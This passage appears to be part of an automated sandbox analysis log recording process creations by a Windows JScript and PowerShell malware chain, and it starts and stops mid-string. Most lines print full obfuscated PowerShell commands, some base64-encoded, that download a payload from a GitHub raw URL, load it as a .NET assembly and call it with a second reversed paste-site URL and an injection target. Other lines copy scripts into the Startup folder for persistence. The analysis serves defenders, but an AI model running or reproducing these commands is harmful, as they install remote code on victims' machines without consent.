JwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhA